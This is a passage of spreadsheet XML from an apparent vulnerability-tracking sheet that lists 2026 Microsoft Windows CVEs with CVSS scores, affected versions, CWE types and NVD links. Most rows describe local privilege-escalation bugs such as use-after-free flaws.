      <c r="A789" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B789" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C789" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69413</t>
        </is>
      </c>
      <c r="D789" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E789" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F789" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G789" s="5" t="inlineStr"/>
      <c r="H789" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I789" s="5" t="inlineStr"/>
      <c r="J789" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K789"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789" s="5" t="inlineStr"/>
      <c r="M789" s="5" t="inlineStr"/>
      <c r="N789" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O789" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P789" s="5" t="inlineStr"/>
      <c r="Q789" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R789" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S789" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69413</t>
        </is>
      </c>
    </row>
    <row r="790">
      <c r="A790" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B790" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C790" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69422</t>
        </is>
      </c>
      <c r="D790" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E790" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F790" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G790" s="5" t="inlineStr"/>
      <c r="H790" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I790" s="5" t="inlineStr"/>
      <c r="J790" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K790" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L790" s="5" t="inlineStr"/>
      <c r="M790" s="5" t="inlineStr"/>
      <c r="N790" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O790" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P790" s="5" t="inlineStr"/>
      <c r="Q790" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R790" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S790" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69422</t>
        </is>
      </c>
    </row>
    <row r="791">
      <c r="A791" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B791" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C791" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69814</t>
        </is>
      </c>
      <c r="D791" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E791" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F791" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G791" s="5" t="inlineStr"/>
      <c r="H791" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I791" s="5" t="inlineStr"/>
      <c r="J791" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K791" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L791" s="5" t="inlineStr"/>
      <c r="M791" s="5" t="inlineStr"/>
      <c r="N791" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O791" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P791" s="5" t="inlineStr"/>
      <c r="Q791" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R791" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S791" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69814</t>
        </is>
      </c>
    </row>
    <row r="792">
      <c r="A792" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B792" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C792" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69816</t>
        </is>
      </c>
      <c r="D792" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E792" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F792" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G792" s="5" t="inlineStr"/>
      <c r="H792" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I792" s="5" t="inlineStr"/>
      <c r="J792" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K792"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792" s="5" t="inlineStr"/>
      <c r="M792" s="5" t="inlineStr"/>
      <c r="N792" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O792" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P792" s="5" t="inlineStr"/>
      <c r="Q792" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R792" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S792" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69816</t>
        </is>
      </c>
    </row>
    <row r="793">
      <c r="A793" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B793" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C793" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69817</t>
        </is>
      </c>
      <c r="D793" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E793" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F793" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G793" s="5" t="inlineStr"/>
      <c r="H793" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I793" s="5" t="inlineStr"/>
      <c r="J793" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K793"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793" s="5" t="inlineStr"/>
      <c r="M793" s="5" t="inlineStr"/>
      <c r="N793" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O793" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P793" s="5" t="inlineStr"/>
      <c r="Q793" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R793" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Port Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S793" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69817</t>
        </is>
      </c>
    </row>
    <row r="794">
      <c r="A794" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B794" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C794" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69818</t>
        </is>
      </c>
      <c r="D794" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E794" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F794" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G794" s="5" t="inlineStr"/>
      <c r="H794" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I794" s="5" t="inlineStr"/>
      <c r="J794" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K794" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L794" s="5" t="inlineStr"/>
      <c r="M794" s="5" t="inlineStr"/>
      <c r="N794" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O794" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P794" s="5" t="inlineStr"/>
      <c r="Q794" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R794" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S794" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69818</t>
        </is>
      </c>
    </row>
    <row r="795">
      <c r="A795" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B795" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C795" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69834</t>
        </is>
      </c>
      <c r="D795" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E795" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F795" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G795" s="5" t="inlineStr"/>
      <c r="H795" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I795" s="5" t="inlineStr"/>
      <c r="J795" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K795"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795" s="5" t="inlineStr"/>
      <c r="M795" s="5" t="inlineStr"/>
      <c r="N795" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O795" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P795" s="5" t="inlineStr"/>
      <c r="Q795" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R795" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S795" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69834</t>
        </is>
      </c>
    </row>
    <row r="796">
      <c r="A796" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B796" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C796" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69838</t>
        </is>
      </c>
      <c r="D796" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E796" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F796" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G796" s="5" t="inlineStr"/>
      <c r="H796" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I796" s="5" t="inlineStr"/>
      <c r="J796" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K796"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796" s="5" t="inlineStr"/>
      <c r="M796" s="5" t="inlineStr"/>
      <c r="N796" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O796" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P796" s="5" t="inlineStr"/>
      <c r="Q796" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R796" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S796" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69838</t>
        </is>
      </c>
    </row>
    <row r="797">
      <c r="A797" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B797" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C797" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69859</t>
        </is>
      </c>
      <c r="D797" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E797" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F797" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G797" s="5" t="inlineStr"/>
      <c r="H797" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I797" s="5" t="inlineStr"/>
      <c r="J797" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K797"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797" s="5" t="inlineStr"/>
      <c r="M797" s="5" t="inlineStr"/>
      <c r="N797" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O797" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P797" s="5" t="inlineStr"/>
      <c r="Q797" s="5" t="inlineStr">
        <is>
          <t>CWE-191, CWE-367</t>
        </is>
      </c>
      <c r="R797" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="S797" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69859</t>
        </is>
      </c>
    </row>
    <row r="798">
      <c r="A798" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B798" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C798" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69866</t>
        </is>
      </c>
      <c r="D798" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E798" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F798" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G798" s="5" t="inlineStr"/>
      <c r="H798" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I798" s="5" t="inlineStr"/>
      <c r="J798" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K798" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L798" s="5" t="inlineStr"/>
      <c r="M798" s="5" t="inlineStr"/>
      <c r="N798" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O798" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P798" s="5" t="inlineStr"/>
      <c r="Q798" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R798" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S798" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69866</t>
        </is>
      </c>
    </row>
    <row r="799">
      <c r="A799" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B799" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C799" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69889</t>
        </is>
      </c>
      <c r="D799" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E799" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F799" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G799" s="5" t="inlineStr"/>
      <c r="H799" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I799" s="5" t="inlineStr"/>
      <c r="J799" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K799" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L799" s="5" t="inlineStr"/>
      <c r="M799" s="5" t="inlineStr"/>
      <c r="N799" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O799" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P799" s="5" t="inlineStr"/>
      <c r="Q799" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R799" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S799" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69889</t>
        </is>
      </c>
    </row>
    <row r="800">
      <c r="A800" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B800" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C800" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69891</t>
        </is>
      </c>
      <c r="D800" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E800" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F800" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G800" s="5" t="inlineStr"/>
      <c r="H800" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I800" s="5" t="inlineStr"/>
      <c r="J800" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K800"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800" s="5" t="inlineStr"/>
      <c r="M800" s="5" t="inlineStr"/>
      <c r="N800" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O800" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P800" s="5" t="inlineStr"/>
      <c r="Q800" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R800" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Media allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S800" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69891</t>
        </is>
      </c>
    </row>
    <row r="801">
      <c r="A801" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B801" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C801" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69896</t>
        </is>
      </c>
      <c r="D801" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E801" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F801" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G801" s="5" t="inlineStr"/>
      <c r="H801" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I801" s="5" t="inlineStr"/>
      <c r="J801" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K801" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L801" s="5" t="inlineStr"/>
      <c r="M801" s="5" t="inlineStr"/>
      <c r="N801" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O801" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P801" s="5" t="inlineStr"/>
      <c r="Q801" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R801" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S801" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69896</t>
        </is>
      </c>
    </row>
    <row r="802">
      <c r="A802" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B802" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C802" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69911</t>
        </is>
      </c>
      <c r="D802" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E802" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F802" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G802" s="5" t="inlineStr"/>
      <c r="H802" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I802" s="5" t="inlineStr"/>
      <c r="J802" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K802"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802" s="5" t="inlineStr"/>
      <c r="M802" s="5" t="inlineStr"/>
      <c r="N802" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O802" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P802" s="5" t="inlineStr"/>
      <c r="Q802" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R802" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S802" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69911</t>
        </is>
      </c>
    </row>
    <row r="803">
      <c r="A803" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B803" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C803" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70283</t>
        </is>
      </c>
      <c r="D803" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E803" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F803" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G803" s="5" t="inlineStr"/>
      <c r="H803" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I803" s="5" t="inlineStr"/>
      <c r="J803" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K803"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803" s="5" t="inlineStr"/>
      <c r="M803" s="5" t="inlineStr"/>
      <c r="N803" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O803" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P803" s="5" t="inlineStr"/>
      <c r="Q803" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R803" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S803" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70283</t>
        </is>
      </c>
    </row>
    <row r="804">
      <c r="A804" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B804" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C804" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70562</t>
        </is>
      </c>
      <c r="D804" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E804" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F804" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G804" s="5" t="inlineStr"/>
      <c r="H804" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I804" s="5" t="inlineStr"/>
      <c r="J804" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K804"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804" s="5" t="inlineStr"/>
      <c r="M804" s="5" t="inlineStr"/>
      <c r="N804" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O804" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P804" s="5" t="inlineStr"/>
      <c r="Q804" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R804" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S804" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70562</t>
        </is>
      </c>
    </row>
    <row r="805">
      <c r="A805" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B805" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C805" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70565</t>
        </is>
      </c>
      <c r="D805" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E805" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F805" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G805" s="5" t="inlineStr"/>
      <c r="H805" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I805" s="5" t="inlineStr"/>
      <c r="J805" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K805"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805" s="5" t="inlineStr"/>
      <c r="M805" s="5" t="inlineStr"/>
      <c r="N805" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O805" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P805" s="5" t="inlineStr"/>
      <c r="Q805" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R805" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows AF_UNIX Socket Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S805" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70565</t>
        </is>
      </c>
    </row>
    <row r="806">
      <c r="A806" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B806" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C806" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70567</t>
        </is>
      </c>
      <c r="D806" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E806" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F806" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G806" s="5" t="inlineStr"/>
      <c r="H806" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I806" s="5" t="inlineStr"/>
      <c r="J806" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K806" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L806" s="5" t="inlineStr"/>
      <c r="M806" s="5" t="inlineStr"/>
      <c r="N806" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O806" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P806" s="5" t="inlineStr"/>
